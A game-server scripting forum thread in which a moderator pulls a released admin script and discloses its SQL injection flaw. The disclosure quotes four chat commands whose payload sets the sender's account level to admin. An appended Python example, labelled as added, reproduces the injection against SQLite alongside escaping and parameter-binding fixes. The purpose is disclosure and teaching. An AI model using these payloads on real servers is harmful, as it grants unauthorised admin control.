[Insecure] HTC & Clan TOR - [0.4] Warchief v2.0

HTC

  • Newbie
  • Posts: 5
« on July 25th, 2015, 01:52 PM »
Last edited on July 26th, 2015, 04:35 AM by Stormeus
HTC & Clan TOR - [0.4] Warchief v2.0

Build: 10156 (Update 25/07/2015)

Language: Portuguese-BR (The English version will be available soon)

Version [0.4] Warchief 2.0 additional controls and systems:

  • MatheuS (Country Detector, mute, unmute)
  • sseebbyy (Nitrous Oxide Systems)
  • Banaqs (Vehicle Fix Function)
  • JaVeD (News System)
  • ADM Script v1.0 (Command format: Kick and Killp)
  • Diego (Ban and Unban)
  • Beztone (Command format: Setmon)
  • George (Gotoloc and Saveloc)
  • Ksna's Cops and Robbers (Special commands)

Updates will be released to fix bugs that still exist in this version

REMOVED - INSECURE

KAKAN

  • Wiki Contributor
  • Posts: 3,347
You can contact me using Discord, at Developers.CPP( check off-board to find the invite link )
Github: https://github.com/theKAKAN

ThunderStorm

  • Newbie
  • Hello
  • Posts: 22



[VSS]Shawn

  • Full Member
  • Posts: 210

Ksna

  • Jr. Member
  • Posts: 86

KAKAN

  • Wiki Contributor
  • Posts: 3,347

MatheuS

  • Wiki Contributor
  • LBR | Co-Leader & Brasil Real RPG | Developer
  • Posts: 439
if( !sucess ) tryAgain();

Joao^

  • Newbie
  • Posts: 15

Stormeus

  • VC:MP Developer
  • oh god how did i get here im not good w computer
  • Posts: 1,123
Re: HTC & Clan TOR - [0.4] Warchief v2.0
« Reply #8, on July 26th, 2015, 04:34 AM »
Quote from [VSS]Shawn on July 25th, 2015, 04:19 PM
Warchief o.0 I might think it will be removed
Well it's okay. It's just literally a straight port of the old Warchiefs (the commands still say they start with /c) but with a lot of other people's snippets duct taped onto it, but that's not a reason to take it down.

What I am going to point out is that this script is amazingly vulnerable to SQL injection. Since I'm already taking down the link because of this, here's a full disclosure:

You can easily gain admin rights on any server that runs this script by using any of these commands and rejoining:
Quote
/quote '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/buycar '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/gotoloc '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/nogoto '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
Virtually no user input is escaped using the escapeSQLString function in SQLite; consequently, these are a few commands that use user input and add them to the query without escaping, generating this flaw. I would absolutely not recommend using this until this script is largely fixed.
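
The flaw described in the post above, shown next to two fixes, as an added example that is not part of the original thread and is not the script's own code. It uses Python's sqlite3 module as a stand-in for the server's SQLite calls; the Locations table, the function names, and the quote-doubling behaviour of the escaper are assumptions made for illustration.

```python
import sqlite3

PAYLOAD = "'; UPDATE Account SET Level = 10 WHERE Name = 'player1';--"  # input quoted in the post

def new_db():
    # Constructed sample data. Account/Level/Name come from the quoted query;
    # the Locations table is a hypothetical stand-in for what /gotoloc reads.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Account (Name TEXT PRIMARY KEY, Level INTEGER);
        CREATE TABLE Locations (Name TEXT, Pos TEXT);
        INSERT INTO Account VALUES ('player1', 1);
        INSERT INTO Locations VALUES ('O''Neil bar', '10,20,30');
    """)
    return db

def level(db, name):
    return db.execute("SELECT Level FROM Account WHERE Name = ?", (name,)).fetchone()[0]

def gotoloc_vulnerable(db, text):
    # Flawed pattern: user text concatenated into the statement. executescript()
    # models (assumption) a query call that runs every statement in the string.
    db.executescript("SELECT Pos FROM Locations WHERE Name = '" + text + "';")

def escape_sql_string(text):
    # Assumed behaviour of an SQLite string escaper: double each single quote
    # so the value cannot terminate the literal it is placed in.
    return text.replace("'", "''")

def gotoloc_escaped(db, text):
    sql = "SELECT Pos FROM Locations WHERE Name = '" + escape_sql_string(text) + "'"
    return db.execute(sql).fetchone()

def gotoloc_bound(db, text):
    # Preferred where the API offers it: the value is bound, never parsed as SQL.
    return db.execute("SELECT Pos FROM Locations WHERE Name = ?", (text,)).fetchone()

def demo():
    # Account level of 'player1' after each handler has processed the same input.
    results = {}
    for label, handler in (("vulnerable", gotoloc_vulnerable),
                           ("escaped", gotoloc_escaped),
                           ("bound", gotoloc_bound)):
        db = new_db()
        handler(db, PAYLOAD)
        results[label] = level(db, "player1")
    return results

if __name__ == "__main__":
    print(demo())
```

The escaped and bound handlers also resolve a legitimate location name containing an apostrophe, which the concatenating handler cannot do.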

HTC

  • Newbie
  • Posts: 5